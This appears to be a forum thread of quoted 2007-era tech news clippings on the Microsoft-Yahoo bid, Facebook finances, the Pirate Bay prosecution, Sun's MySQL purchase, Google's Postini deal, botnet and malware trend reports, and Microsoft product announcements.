Could Microsoft now attempt to exert the same sort of inappropriate and illegal influence over the Internet that it did with the PC? While the Internet rewards competitive innovation, Microsoft has frequently sought to establish proprietary monopolies -- and then leverage its dominance into new, adjacent markets.

Could the acquisition of Yahoo! allow Microsoft -- despite its legacy of serious legal and regulatory offenses -- to extend unfair practices from browsers and operating systems to the Internet? In addition, Microsoft plus Yahoo! equals an overwhelming share of instant messaging and web email accounts. And between them, the two companies operate the two most heavily trafficked portals on the Internet. Could a combination of the two take advantage of a PC software monopoly to unfairly limit the ability of consumers to freely access competitors' email, IM, and web-based services? Policymakers around the world need to ask these questions -- and consumers deserve satisfying answers.

This hostile bid was announced on Friday, so there is plenty of time for these questions to be thoroughly addressed. We take Internet openness, choice and innovation seriously. They are the core of our culture. We believe that the interests of Internet users come first -- and should come first -- as the merits of this proposed acquisition are examined and alternatives explored.
[/QUOTE]

Source: http://googleblog.blogspot.com/

[QUOTE]
Want to know about how privately held Facebook is doing from a financial point of view?

Well, just ask Mark Zuckerberg!

This afternoon, at an all-hands meeting held in a Palo Alto, Ca. theater near the social networking site’s headquarters, the 23-year-old founder was quite voluble on that topic, outlining numbers that a more experienced CEO might think twice about unveiling to a large audience.

With an open dial-in number! Many employees, in fact, were horrified that Zuckerberg would be so blabby about such important financial information. Others loved it.

Most were simply surprised (although, to be fair, Google Co-Founders Larry Page and Sergey Brin used to give a lot of detailed company info to their employees before going public, but in coordination with other execs).

“I can’t believe he was doing it,” said one. “It was really unbelievable.”

Believe it! Some highlights?

Revenue for Facebook for 2007 will be $150 million, as has been widely reported. But for 2008, Zuckerberg projected revenue to be increased to $300 to $350 million.

More interesting was the news that Facebook would spend $200 million next year on capital expenditures, which is a whole lot of servers.

By the way, more expenses, noted chatty Mark, those employee levels would rise to more than 1,000 in 2008 from 450 now.

And Zuckerberg also said the company’s EBITDA–earnings before interest, taxes, depreciation and amortization and a number widely used by Wall Street as an indication of operating performance–would be $50 million in 2008.

That means, the company would have a negative cash flow of about $150 million (EBITDA minus CapEx), rather than break even, as it does now.

But who’s counting? Zuckerberg apparently said he did not care about maintaining EBITDA anyway.

That’s because Facebook collected $300 million in investments recently from Microsoft and other investors, which pegged the valuation of the company at $15 billion.
[/QUTOE]

Source: http://kara.allthingsd.com/

[QUOTE]
Sweden plans this week to charge the people running Pirate Bay, one of the world's most visited websites, with being accessories in breaking copyright law.

Pirate Bay helps web surfers share copyrighted music and film files, which is illegal in many countries, including Sweden.

Public prosecutor Hakan Roswall said last week he will charge the Swedish site's organisers with accessory and conspiracy to break copyright law, which could lead to fines or up to two years in prison.

The charges will be filed in a district court on January 31.

The Motion Picture Association of America and the International Federation of the Phonographic Industry (IFPI) are among those who have called for action to shut down the site.

No copyright material is stored on Pirate Bay's servers and no swapping of files actually takes place there. Rather, Pirate Bay locates file sharers on the Internet and acts as a directory of so-called torrent files.

BitTorrent is a protocol that enables big file transfers. The torrent files, downloadable from Pirate Bay, contain the information needed to download film or music files from others.

"It's not merely a search engine. It's an active part of an action that aims at, and also leads to, making copyright protected material available," Roswall told Reuters.

"It's a classic example of accessory - to act as intermediary between people who commit crimes, whether it's in the physical or the virtual world," he said.

But the people behind the site say they cannot be held responsible for material that is being spread.

"It's idiotic. There is no legal ground (for the charges)," Pirate Bay spokesman Peter Sunde told Reuters.

The case is partly based on evidence collected in a 2006 raid against Pirate Bay's servers, located then in Stockholm.

Pirate Bay was started by a Swedish anti-copyright group in 2003. Later the site was run by Sunde and two others, Gottfrid Svartholm and Fredrik Neij. Neij owns the domain.

It does not charge users and earns money from advertisers.

Roswall said it could take more than convictions in Sweden to stop Pirate Bay. "Because the infrastructure is scattered among several places around the world... no separate country will be able to stop the site," he said.

But he believes advertisers could have second thoughts about using Pirate Bay if a guilty verdict is handed down. "That can be the sort of thing that influences the site in the long run."

Sunde said there were no plans to shut down the site in the event of a conviction. He said he, Svartholm and Neij were unaware of the location of Pirate Bay's current servers.

He said Pirate Bay had 2.5 million registered members and about as many visit the site every day.

In 2007, some 600,000 out of nine million Swedes downloaded feature films, according to Mediavision. The Swedish research firm expects the number to rise to some 800,000 this year.

IFPI estimates there are 20 illegal music downloads worldwide for every one legal sale, IFPI spokesman Alex Jacob said.
[/QUOTE]

Source: Reuters, http://www.smh.com.au/

[QUOTE]

Sun Microsystems is taking the plunge into the database market with the purchase of open source database developer MySQL for $1 billion ($800 million in cash in exchange for all MySQL stock and assumption of approximately $200 million in options).

With the move, announced Wednesday, Sun takes a big leap into the $15 billion database market and pits it against the likes of Microsoft, IBM and Oracle. MySQL (all resources) also gives Sun entry to some customers that may be interested in buying more equipment and software. MySQL counts Facebook, Google, Nokia and Baidu as customers.

During a conference call this morning Sun and MySQL executives sang kumbaya. On the call, Sun CEO Jonathan Schwartz called the MySQL deal the “most important acquisition in history of company” and added that the database firm will have “a central role” as Sun rolls out its open source strategy. Sun is in the process rolling up a complete open source stack, becoming the largest open source organization of world.

Here’s what makes MySQL interesting to Sun. About 20 percent of MySQL deployments run on Solaris, according to Sun estimates outlined on a conference call. Seventy five percent of MySQL deployments are not on Sun hardware. That gives Sun an opportunity to bundle hardware software and services. Although Schwartz noted that the software and hardware business operate separately MySQL could give Sun some leverage as customers look to consolidate vendors.

Sun (all resources) can also distribute MySQL through its channel and OEM partnerships and create various bundles. The overarching goal is to give MySQL more “commercial appeal” and boost adoption of open source software in the enterprise.

In a statement, Schwartz said the MySQL purchase puts his company at “the center of the global Web economy” since the open source database provider is entrenched at Web giants. MySQL is included in that platform that includes Linux, Apache and PHP/Perl commonly known as LAMP.

Schwartz followed up on his blog:

We’re putting a billion dollars behind the M in LAMP. If you’re an industry insider, you’ll know what that means - we’re acquiring MySQL AB, the company behind MySQL, the world’s most popular open source database.

You’ll recall I wrote about a customer event a few weeks ago, at which some of the world’s most important web companies talked to us about their technology challenges. Simultaneously, we gathered together some of the largest IT shops and their CIO’s, and spent the same two days (in adjoining rooms) listening to their views and directions.

Both sets of customers confirmed what we’ve known for years - that MySQL is by far the most popular platform on which modern developers are creating network services.

One big question is what Sun does next to build out its stack of open source software and other applications covering middleware, storage and virtualization. Sun’s software lineup now includes Java, MySQL, OpenSolaris and GlassFish.

The company can now pair MySQL with Solaris and could fill out its roster with other targeted acquisitions. A large scale merger with a company like Red Hat is probably a non-starter though given Sun’s infatuation with Solaris.

Sun plans to integrate MySQL into its software, sales and service groups and MySQL CEO Marten Mickos will stay after the acquisition.

Mickos on the conference call added that the deal makes “wonderful sense” because the combined company can offer a diversified software stack to multiple platforms.

In a statement Mickos said, “Sun’s culture and business model complements MySQL’s own by sharing the same ideals that we have had since our foundation — software freedom, online innovation and community and partner participation.”

Marten Mickos, MySQL CEO, joins the Sun open source soul train and managed a healthy exit for his company’s founders and investors, which includes Benchmark Capital, Institutional Venture Partners, Index Ventures, Holtron Ventures, Intel Capital, Presidio STX, Red Hat, Scope Capital and various angels.

Other questions about the deal remain. Among them:

How will the MySQL community handle being part of Sun? Sun is a member of the open source community, but has been controversial and viewed as late to the game on taking Java to the masses. Sun has contributed a lot, but folks don’t like change. Sun plans to optimize and bundle MySQL with its software and hardware, but if this is viewed as a sales pitch there will be issues. One talkbacker in this post is already skeptical. I’m curious to see the community reaction here.

Schwartz wrote:

MySQL is already the performance leader on a variety of benchmarks - we’ll make performance leadership the default for every application we can find (and on every vendor’s hardware platforms, not just Sun’s - and on Linux, Solaris, Windows, all). For the technically oriented, Falcon will absolutely sing on Niagara… talk about a match made in heaven.

Can Sun bridge the enterprise-startup divide with MySQL? Schwartz on his blog noted the following:

CTO’s at startups and web companies disallow the usage of products that aren’t free and open source. They need and want access to source code to enable optimization and rapid problem resolution (although they’re happy to pay for support if they see value). Alternatively, more traditional CIO’s disallow the usage of products that aren’t backed by commercial support relationships - they’re more comfortable relying on vendors like Sun to manage global, mission critical infrastructure.

That’s an excellent point and presents a conundrum. If Sun makes MySQL more enterprise acceptable does that diminish its mojo with startups? Does it matter?

Mickos said the enterprise-startup bridge is a “big opportunity” and Sun can capitalize on because the MySQL roadmap will be sped up as the two companies focus on scale, performance and integration. “We stand out from most databases,” explained Mickos. “MySQL was developed for online world. Our relevance grows in the enterprise as they shift to Web-based architectures.”

Separately, Sun said it expects to report fiscal second quarter revenue of $3.6 billion and earnings of 28 cents to 32 cents a share. Wall Street is expecting earnings of 29 cents a share on sales of $3.58 billion.

[/QUTOE]

Source: http://blogs.zdnet.com/

[QUOTE]

After a productive and valuable conversation with my publisher, Random House, they've agreed to permit The Future of Ideas to be licensed under a Creative Commons Attribution-Noncommercial license. You can download the book for free here, or above.

This means all four of my books are now CC licensed. Code (v1) was licensed under a BY-SA license; so too, Code (v2). And Free Culture and now The Future of Ideas are licensed under BY-NC licenses.

I am particularly glad that The Future of Ideas is now freely licensed. That book hit the stores 2 weeks after September 11. I'm glad it now has a chance to flow a bit more freely.

Thanks to Random House (and Basic Books, and Penguin) for being open to this experiment. I hope we'll have some useful data to report about its effect.
[/QUOTE]

Source: lessig.org/blog/

[QUOTE]
One of Hollywood's biggest foes is about to be called on the carpet. After years of steering Web surfers to free entertainment, the organizers of a massive directory of pirated movies, music and software in Sweden could finally face serious legal repercussions.

Based on evidence collected in a 2006 raid on the offices of The Pirate Bay, Swedish prosecutors say that by the end of January they expect to charge the individuals who operate the file-sharing service with conspiracy to breach copyrights.

While Sweden might seem to be an unlikely harbor for pirates of any kind, weak copyright laws, lax enforcement, high broadband penetration and general antipathy toward the entertainment industry have made it a file-sharing free-for-all. Last year, 43% of the people participating in a survey by Sweden's biggest phone company said they planned to download music during the year. A pro-piracy political party has more members than the Greens.

The prosecutors' move comes after years of complaints from Hollywood executives and U.S. government officials. U.S. Embassy officials have described Sweden as home to the "worst Internet piracy in the world," and the Motion Picture Association of America has been fighting to shutter Pirate Bay's site for years.

Sweden, which enjoys some of the world's fastest Internet speeds, strengthened its laws in 2005 to make online theft of movies a crime. But its efforts to crack down have had little success so far. In 2006, shortly after Swedish Justice Department representatives visiting Washington received a stern lecture from U.S. officials about the alleged damage being caused by Pirate Bay, Swedish police raided the site's offices and shut it down.

Although the site was back up within days, the raid inspired hundreds of pro-piracy citizens to take to the streets in protest and led to allegations that the U.S. was interfering in Swedish affairs. Pirate Bay won cult status among file sharers globally, and many Swedes continue to revere its founders as plucky upstarts who dared to take on Hollywood.

Underscoring Sweden's pro-piracy attitude, seven parliamentarians from the ruling conservative party called in a newspaper opinion article last month for the decriminalization of file sharing. "It has become a big part of people's lives," Karl Sigfrid, one of the politicians, said in an interview. "I believe it is impossible to really stop this."

There's no doubt millions of people across the world turn to Pirate Bay whenever they want a free movie, game or piece of software. Its reach is so vast that the family of Ron Goldman has filed suit against the site, claiming in court documents to have lost at least $150,000 because of Pirate Bay. The Goldman family is supposed to receive the proceeds from O.J. Simpson's book "If I Did It," but the text is available free using the directory at ThePirateBay.org.

The trial will probably grapple with complex technical issues. One question is the legality of BitTorrent, a computer program that breaks up large files like movies into small pieces so they can be transferred quickly over the Internet.

Although The Pirate Bay maintains an index of BitTorrent files, the files themselves are stored on the computers of other people around the world. Because the copyright files aren't stored on Pirate Bay computers, the site says it isn't breaking the law. Police, prosecutors and entertainment-industry lawyers say the distinction is bogus. The MPAA estimates The Pirate Bay's Web site generates $60,000 a month in advertising revenue. Pirate Bay spokesman Peter Sunde says he isn't sure about exact revenue numbers, but he maintains that Pirate Bay has never made a profit, in part because of the high cost of maintaining servers around the world.

For all the resources the entertainment industry, the U.S. and Sweden have put into the case, the outcome is far from certain. Even if Sweden wins convictions and jail time, the site won't be shut down immediately. Separate legal action would be required to accomplish that, and it might be beyond the reach of Swedish authorities because Pirate Bay says its computer servers have been moved to other countries. "The suspects hide their information all around the world, and I am pretty sure even if they are convicted that wouldn't stop the service," says Swedish prosecutor Hakan Roswall.

The Pirate Bay's operators say they are expecting the charges and will prepare their defense with the aid of government-funded lawyers for a trial later this year. "We're not worried," says Fredrik Neij, a Pirate Bay co-founder. "We think the law is on our side." The movie industry, which in Europe typically focuses on public-relations campaigns to sway public opinion rather than the lawsuits it uses in the U.S., is hoping that details will emerge to turn the tide against file sharers in Sweden.

That is a tall order given the site's local popularity. For example, the heir to the Wasabröd fortune -- a popular cracker-like snack in Sweden -- has supported the group in the past, allowing a phone company he owned to provide the site with bandwidth and server space in its early days.

The public delights in the group's attitude toward anybody who sends it cease-and-desist letters, which are often published on the Web site along with Pirate Bay's cheeky replies. Some 157,000 movies, songs and other files can be found on the site, according to the MPAA, and 1.5 million people visit it a day, Mr. Neij says. The most popular movie on the site: Will Smith's "I Am Legend."

Rather than operate underground, The Pirate Bay's operators court publicity. Last year, they gained control of an Internet domain name used by the International Federation of Phonographic Industries, a music trade group that is essentially the international version of the Recording Industry Association of America. The site, www.ifpi.com, was redubbed the International Federation of Pirate Interests. The London-based IFPI got the domain name back last month.

The Pirate Bay's operators say they have been followed in recent weeks by camera-toting private detectives in foreign-registered cars. In September, they filed a police complaint claiming that MediaDefender, a U.S. counterpiracy company, had been hired by several Hollywood studios and music companies to hack into their site and shut it down.

MediaDefender, which itself was hacked by a shadowy group last year, denies the accusation. "We're a reputable public company," says Chief Executive Randy Saaf. "We're not going to be doing hacking. That's silly."

While the entertainment industry hopes a guilty verdict will deter other Swedes from file sharing, it acknowledges that making more entertainment available for legal download would help.

"New services are being explored," says Geraldine Moloney, a spokeswoman in Europe for the MPAA. "The industry is committed to offering film fans as much choice as possible."
[/QUOTE]

Source: http://online.wsj.com/

[QUTOE]
Google has announced the acquisition of communications security and compliance company Postini for $625million.

Postini offers a number of on-demand communications security and compliance solutions and serves more than 35,000 businesses and 10 million users worldwide. Postini’s services include message security, archiving, encryption, and policy enforcement tools which can be used to protect a company’s email, instant messaging, and other web-based communications platforms. Notably Google was already utilizing Postini technology with Gmail; the acquisition would appear to be a case of Google wanting to own a technology it was already using under license.

The acquisition of Postini comes as a surprise following rumors in June that the company was working towards an IPO.

Dave Girouard, Vice President & General Manager, Google Enterprise wrote on the Google Blog of the need for Google to deliver products that support complex business rules, information security mandates, and an array of legal and corporate compliance issues.

We realized that we needed a more complete way to address these information security and compliance issues in order to better support the enterprise community. That’s why we’re excited to share the news that we’ve agreed to acquire Postini, a company that offers security and corporate compliance solutions for email, IM, and other web-based communications. Like Google Apps, Postini’s services are entirely hosted, eliminating the need to install any hardware or software. A leader in its field, Postini serves more than 35,000 businesses and 10 million users, and was one of our first partners for Google Apps. Their email and IM management services include inbound and outbound policy management, spam and virus protection, content filtering, message archiving, encryption, and more. We will continue to support Postini’s customers and we look forward to the possibilities ahead.

The acquisition is expected to be finalized by the end of the third quarter 2007.
[/QUOTE]

Source: http://www.techcrunch.com/

[QUOTE]
We've officially acquired Postini
9/13/2007 03:07:00 PM
Posted by Dave Girouard, Vice President & General Manager, Google Enterprise

As of today, Postini becomes a wholly owned subsidiary of Google, and we couldn’t be happier about it. (Here's the FAQ.) Since July 9, when we announced the agreement to acquire Postini, plenty of businesses have told us how much they respect Postini and how the acquisition makes sense for customers of both companies.
We view this as welcome news, but also a sign of things to come. With the more than 100,000 businesses on Google Apps, 35,000 businesses and more than 10 million users of Postini products, we see great potential on both sides. We're committed to continue to deliver the type of innovative and useful business products our customers have come to expect. And we plan to announce even more product offerings in the very near future. Separately, both companies shared a vision for what the world of hosted applications can become for businesses of all sizes. Together, we look forward to achieving it.
[/QUOTE]

Source: http://googleblog.blogspot.com/

[QUOTE]

It’s the season for online shopping and spending, and you’ll be glad to know that we’ve stepped up our fight against one of the most serious cyber security threats just in time for the holidays.

That threat involves what are called ‘botnets’—armies of personal computers taken over by cyber criminals and used on the sly to commit all kinds of mischief, from identity theft to denial of service attacks to massive spam campaigns. Bah, humbug.

In June, we announced the first phase of Operation Bot Roast, which pinpointed more than a million victimized computers and charged a number of individuals around the country with various cyber-related crimes.

Today, we’re announcing part two of this operation, with more results:

• Three new indictments, including two this past month. In one case, we uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
• Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
• The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.

Our investigations spanned the country, including our field offices in Cincinnati, Detroit, Jacksonville, Los Angeles, Philadelphia, Sacramento, and Washington, D.C., which worked closely with a great many partners, including the Secret Service and Immigrations Customs Enforcement.

And these cases spanned the globe, involving information sharing and coordination with international colleagues like the New Zealand police. This week, authorities there conducted a search of the residence of the supposed ringleader of an elite global botnet coding group who goes by the cyber name of “AKILL.”

The collective toll revealed so far in our operation has been significant, both at a national level and a personal level. To date, we’ve uncovered more than $20 million in economic losses. In one case, a victim confirmed damages of nearly $20,000 in denial of service attacks via botnets.
[/QUOTE]

Source: http://www.fbi.gov/

By Andy Patrizio
September 17, 2007

Symantec today released its 12th bi-annual Internet Security Threat Report covering malicious activity over the first six months of the year, which confirms some trends that have been emerging and notes some new ones, as well.

The report covers activity from Jan. 1 to June 30 of this year, covering data gathered by Symantec's Global Intelligence Network. This consists of more than 40,000 sensors monitoring network activity in over 180 countries and sample code gathered by more than 120 million client, server, and gateway systems that have deployed Symantec’s antivirus products.

Also, Symantec runs what it calls the Probe Network, a system of over 2 million decoy accounts to attract e-mail messages from 20 different countries around the world, which allows Symantec to measure global spam and phishing activity.

What it found isn't pretty. Malicious activity is less computer vandalism and much more in the realm of criminality. Gone are the days when some punk's virus stomped on your FAT table and wrecked the hard drive. Symantec, along with many other antivirus vendors, thinks viruses as we know them are in decline, replaced with crimeware.

"Viruses are dropping in favor of theft," Zulfikar Ramzan, senior principal researcher in Advanced Threat Research at Symantec, told InternetNews.com. "Of the top 20 samples we received, 65 percent could threaten confidential info, and 88 percent of those were keystroke loggers. Goes to show hackers are much more after the financial benefits of their activities as opposed to the notoriety of it."

Making things worse is the commercialization of malware thanks to development kits that allow anyone to make a Trojan or worm. The most notorious is MPACK, written by a Russian crimeware gang, that Ramzan said goes for around $1,000. MPACK comes with sample code, making it easy to jumpstart the task.

"[Malware is] getting worse because developers aren't starting from scratch; they're taking existing work and making it worse," he said. In addition, Symantec found that 42 percent of phishing attacks were from 3 specific kits, none of which have a name.

In general, Ramzan said phishing operations can be completely outsourced and require no technical skills. All one needs is a kit to develop a phishing attack relatively easily, rent time on spam and phishing servers, buy a list of e-mail addresses from the underground economy, and go trolling.

Once you have a bunch of credit cards, bank accounts or identities, you can then turn around and sell them on underground servers. Ramzan found credit cards selling for 50 cents to $5, depending on the limit, bank accounts selling for $30 to $400 and identities selling for $6 to $100.

A lot of the crooks involved in this business actually treat it like a job. "We notice more activity on weekdays then weekends. There's a supply chain from the underground, commoditization of the tools, support contracts for the toolkits. There's an incredible amount of professionalization that's gone into this world," he said.

Overwhelmingly, the targets of attacks are home users. Symantec estimates 95 of all attacks in the last six months have been aimed at the home user, an increase from the 87 percent last year.

And those attacks are not aimed at vulnerabilities. Even though Symantec found all of the operating system vendors have improved their response times to when a vulnerability pops up, with the exception of HP, that's not where the criminals are going. Symantec found that exploits of vulnerabilities only made up 18 percent of attacks. The rest were simply looking for a sucker to click on the wrong link or run a file they shouldn't.

One of the new areas of exploitation is browser plug-ins. Symantec saw an explosion from 74 to 237 over the course of one period between reports. Ramzan said the plug-ins are becoming targets because the browsers are being hardened. The only browser under attack is Apple's Safari, which went from four in the last report period to 25 in this most recent one, a testament to Apple's growing popularity.

Rootkits, those devils that seemed to scare the daylights out of everyone, seem to have fallen off the radar. The one exception was the Storm Trojan because it used a rootkit to hide itself. Trojans remain the most common form of attack, which require a gullible end user, not an exploit

[QUOTE]
Denial-of-service attacks are growing faster than bandwidth is being added to the internet, according to VeriSign, the company that administers the .com domain.

Criminal groups selling services online are increasingly threatening the fabric of the internet, as the size of the compromised networks of computers they control increases, according to VeriSign.

The company claimed that a successful denial-of-service (DoS) attack against VeriSign could bring down the internet. "There are attacks attempting to shut down our servers," said Ken Silva, VeriSign's chief security officer. "This would effectively shut down the internet."

Silva said that although DoS attacks are difficult to trace, there are "a couple of well-known groups in Russia, China and Romania" that may be acting with their government's knowledge. "It would be hard to imagine groups who have this much activity going unnoticed by their governments," he said.

The chief security officer said that VeriSign "hoped to get smarter" in blocking malicious traffic. "We can continue to add bandwidth, but ultimately 20 years down the road, this can't continue as a footrace. The internet as a whole has to get smarter in denying DoS attacks."

VeriSign is currently upgrading its infrastructure in a scheme called Project Titan. This has included adding bandwidth, but it is also monitoring its systems more closely.

"Our monitoring systems now resemble those for the space shuttle," said Silva. "We monitor the capability of our CPUs and memory allocation on all of our servers. We're predicting what problems will occur rather than waiting for them to occur."

Many public-sector organisations in the UK suffer from DoS attacks. The Probation Service has upgraded its servers in the past week to cope with the traffic created by botnets, according to a security manager for the Probation Service.

"We've had to upgrade our hardware in the last week to cope with an unexpected increase in the volume of malicious traffic at the network gateway," the security manager told ZDNet.co.uk. "Simply coping with that is compromising our ability to run our business. The problem is simply coping with what is coming at us."

Tim Pickett, a former technical security analyst at AOL, said that ISPs should monitor their networks to mitigate DoS attacks. "ISPs should be monitoring what's going through their networks," said Pickett. "More should be done to tackle the problem on the ISP side."

[/QUOTE]

Source: http://news.zdnet.co.uk

Image spam is old news. The spammers use botnets to send uniquely modified images in each spam e-mail. The images have to be unique – otherwise spam filters could just simply drop known spam images.

So far, the images have typically been modified by adding colors, changing fonts, and inserting random dots and lines.
Results have typically looked like this (URLs smudged to prevent accidental business benefits for the spammers):

Over the last few days, we're seeing more image spam that is rendering the spam text with a pseudo 3D layout:

Generating images like this is of course more computing intensive… but hey, spammers have lots of computing power at their disposal via the huge botnets they're running. It's not like they couldn't afford to render unique 3D spam for every recipient.

More on: http://www.f-secure.com/weblog/#00001267

At Microsoft's Worldwide Partner Conference, CEO Steve Ballmer gave a few more details about the company's move toward hosting services.

[QUOTE]
Microsoft's top executive outlined the company's plan to transition from a traditional software company to offering software plus services for the first time on Tuesday, giving some roadmap details for how the strategy will play out in the next year.

In a keynote at the Worldwide Partner Conference in Denver, Microsoft CEO Steve Ballmer shed more details on the plan other executives, such as Chief Software Architect Ray Ozzie, have been teasing out over the past year -- but not many more. He gave a time frame for the early part of the transition but mostly echoed what other executives have said about Microsoft's slow transition to adding hosted business services to its traditional software portfolio.

"For software plus services, the time is now," Ballmer said, finishing off the first of a raft of keynotes on the first day of Microsoft's annual partner conference. He said that over the next year, Microsoft will continue to sell mostly on-premises software, but there will be more evidence of the transition to its hybrid model as the year goes on.

Since Microsoft began talking about its plan to gradually transition to offering more hosted services last year in a speech by Ozzie at its TechEd Conference in Boston, many noted that the company had no choice. With such an entrenched business in enterprise and consumer desktop software, it would be impossible for Microsoft to be as nimble in offering hosted services as rivals like Google and Salesforce.com, which started their businesses as Web-based services providers. And a warmer reception for hosted services is clearly the direction the enterprise market is heading as businesses become more comfortable accessing Web-based services beyond the traditional consumer staples of e-mail and search that have been popular for years.

The transition to providing more services will touch every part of Microsoft's business, but some changes will be more obvious than others, Ballmer said. The user interface will be an important place for innovation in this area, and Microsoft's Silverlight technology is the cornerstone of that, he said. Microsoft introduced Silverlight, a browser plug-in that allows for rich video and interactive media experience to be delivered within Web sites, in April.

A solid services platform on which partners can build services and also that they can resell with Microsoft managing and hosting them also will be a clear sign of the transition, Ballmer said. Microsoft already is offering a combination of consumer-oriented services, such as Windows Live Hotmail and Windows Live Local Search, but will begin bulking up its portfolio of enterprise services as well, he said.

Microsoft already has unveiled business services like Exchange Hosted Services for enterprise messaging and Office Live hosted service for small businesses. There will be new and expanded services like these as Microsoft progresses further with its software plus services strategy, Ballmer said.
[/QUOTE]

Found on: www.infoworld.com

The World Wide Web Consortium (W3C) ( http://newsletter.infoworld.com/t?ctl=180648E:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4 ) is announcing Wednesday that it has completed work on the WSDL 2.0 Web services standard, which expands HTTP and SOAP support for Web applications.

More: http://newsletter.infoworld.com/t?ctl=180647F:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4

[QUOTE]
BERKELEY, California -- Two technologies demonstrated at the International Virtual Reality Photography Conference over the weekend come close to delivering the amazing imaging technologies used in Blade Runner to zoom deep into pictures and explore them from different angles.

Both developed by Microsoft, one application allows viewers to zoom deep into gigantic, gigapixel panoramic images. A sweeping view of downtown Seattle and the Puget Sound can be enlarged to show diners sitting in the Space Needle. Another application constructs 3-D objects from hundreds of ordinary 2-D photographs, allowing the object to be explored from any angle.

The most impressive demonstration at Sunday’s IVRPC seminar was Photosynth from Microsoft Live Labs -- a program that constructs large-scale, 3-D models of objects like buildings from hundreds of still photographs.

Using a mouse, viewers can walk in -- and around -- the 3-D model, looking at the object from almost any angle. Viewers can isolate individual shots, and quickly zoom into the tiniest details with a roll of the mouse scroll wheel. (Online demos available here require Windows XP SP2 or Vista).

One reconstructed scene showed the Trevi fountain in Rome, stitched together from 350 photographs scraped from Flickr. The immersive scene incorporated images shot with everything from cell-phone cameras to high-end SLRs.

Another 3-D panorama reconstructed the lavish Gyeongbokgung palace in Seoul, Korea, integrating both professional shots and photographs submitted by amateurs.

“You can actually jump into the images,” remarked Drew Steedly, a scientist with Microsoft Live Labs.

Photosynth uses a visual algorithm to scan through hundreds of images, hunting for distinctive features. After identifying features common to different pictures -- doors, windows and sculptures -- the program links the photos together and calculates the 3-D position of each picture.

The technique is similar to depth perception -- where the brain combines different views from each eye into one seamless 3-D view. In Photosynth, the system establishes a "point-cloud" for each photograph space, and then stitches the latticework of images to create a dazzlingly seamless three-dimensional interactive environment ready for exploration.

"We’re working on releasing something where you could make your own collection,” said Steedly, although when pressed, he admitted there's no timetable for the public rollout of Photosynth.

Matt Uyttendaele of Microsoft Research showed off HD View, a high-definition panoramic viewer that can handle monster panoramic shots, often several gigapixels big.

The browser-based viewer provides an immersive wide-angle view, up to 360 degrees, and is capable of displaying images composed of billions of pixels. (Again, the technology requires XP or Vista).

The sweeping panorama of Seattle was composed of 800 images taken with a zoom camera mounted on a motorized telescope tripod. The tripod stepped the camera across the panorama as it captured a mosaic of 20 megapixel images.

"Its pretty amazing, details in the JPEG images that you don’t even realize are there," said Uyttendaele. "It’s just another dimension to exploring these really large images."

Currently available only for Windows, a new version of HD View will be released in a few weeks that adds tone mapping, which sharpens images by automatically removing atmospheric haze.

“We’re encouraging people to try this out if they want,” said Uyttendaele.
[/QUOTE]

Source: http://www.wired.com

[QUOTE]
Apple is becoming a favorite target of security researchers these days. In April, there was the $10,000 CanSecWest hack a Mac contest, and on Monday, there was the Safari Web browser. Or the public beta of Safari for Windows, anyway.

Just hours after Apple released its first Windows beta of Safari, researcher Aviv Raff said he'd found a bug.

In an interview, Raff said that it took about three minutes of fuzzing to find the bug and that he hadn't tested the issue on Mac OS X. So he couldn't say whether or not it affected Safari on Windows only. The bug causes the browser to crash and "might be exploitable," according to Raff, meaning it could possibly be used to run malware on the PC.

Raff was clearly unhappy with Apple's claim that Safari was designed to be "secure from day one" (he called this claim "pathetic"), but he said he wasn't particularly going after Apple. "I don't pick just on Apple," he said. "I've posted about Microsoft and Mozilla issues too."

"Everyone has bugs, but not everyone says that they are 'designed to be secured from day one,'" he added. "I guess it's day zero now."
[/QUOTE]

Source: www.infoworld.com

Microsoft officially launched Popfly as a private alpha.

What the heck is it?

[QUOTE]
Popfly is the fun, easy way for anyone to build and share mashups, gadgets, Web pages, and applications. Popfly consists of two parts:

1. Popfly Creator is a set of online visual tools for building Web pages and mashups.

2. Popfly Space is an online community of creators where you can host, share, rate, comment and even remix creations from other Popfly users.

See the video here for how to easily use online services like Flickr, Digg, and even World of Warcraft without writing code.
[/QUOTE]

Source: blogs.msdn.com/danielfe

[QUOTE]
One beta ends and suddenly five more spring up in its place. We can finally get the talk around Windows Live going again - the Windows Live Folders site has just opened up in preparation for the beta. (Please note the beta has not yet started, so the site will not work correctly.)

So how does it work? Windows Live Folders allows you to upload your files to the cloud, providing access to them from an internet browser (both IE and Firefox are supported). The key part is using Windows Live ID to limit access to the files you have uploaded, allowing you to keep them private, share them with contacts, or make them public. With Windows Live, it's the sum of the parts that gives it so much potential. Here's a summary of the Folders service:

Personal

• Use personal folders to back up important files that are only for you.
• Get to your files from any computer with Internet access by signing in with your Windows Live ID.

Shared

• Shared folders make it easy to collaborate with coworkers or classmates.
• You decide how much control each person has over each shared folder. Some can just read what's there: others can add and delete files.
• Everyone who is sharing uses their own Windows Live ID.

Public

• With public folders, anyone on the Internet can view your files, but they can't change them.
• Want to show your public files to others? Just send them a link! Each folder and file has its own web address.

The beta service looks to only be offering 500MB initially, with a maximum file size of ~50MB but as we've seen with the just-launched Windows Live Hotmail, internet services need to be scaled up carefully. There's no Windows Live Folders client available for download either, undoubtably a key part of the "Live Drive" package, but lets not get too disappointed yet. The beta we've all been waiting for is almost here.

A brief review and screenshots is available separately as this post got too long.

Windows Live Folders homepage

[/QUOTE]

Update: The site has been taken down for now. Subscribe to RSS feed to find out when the beta starts for good.

Source: liveside.net/blogs/

The french website ecrans.fr describes a trick on how you can get a deeper zoom in Google-Maps.

Go to http://maps.google.de/ and:

1. search for your preferred location
2. zoom in (maximum)
3. click on the button "URL for this page" (right upper corner)
4. search in the URL for "UTF8&z=19" and replace the number 19 with 23 or even 24 (but it works mostly only with numbers < 21 and the resolution is not everywhere the same!!) 

This example (Tchad) shows an impressive zoom.

Source: http://www.ecrans.fr/spip.php?article907

Wegen der Schnelligkeit und Genauigkeit der Suchmaschinen braucht es keine leicht erkennbaren Webadressen mehr. IT-Week-Redakteur David Neal elaboriert über die Zwecklosigkeit der Namenssuche.

>>> hier geht's zur Studie: http://www.it-im-unternehmen.de/strategie/article20070222017.aspx

[QUOTE]
Microsoft will showcase the Xbox 360's IPTV service for the first time in Europe at The Connected Home Show at London's Olympia next month.
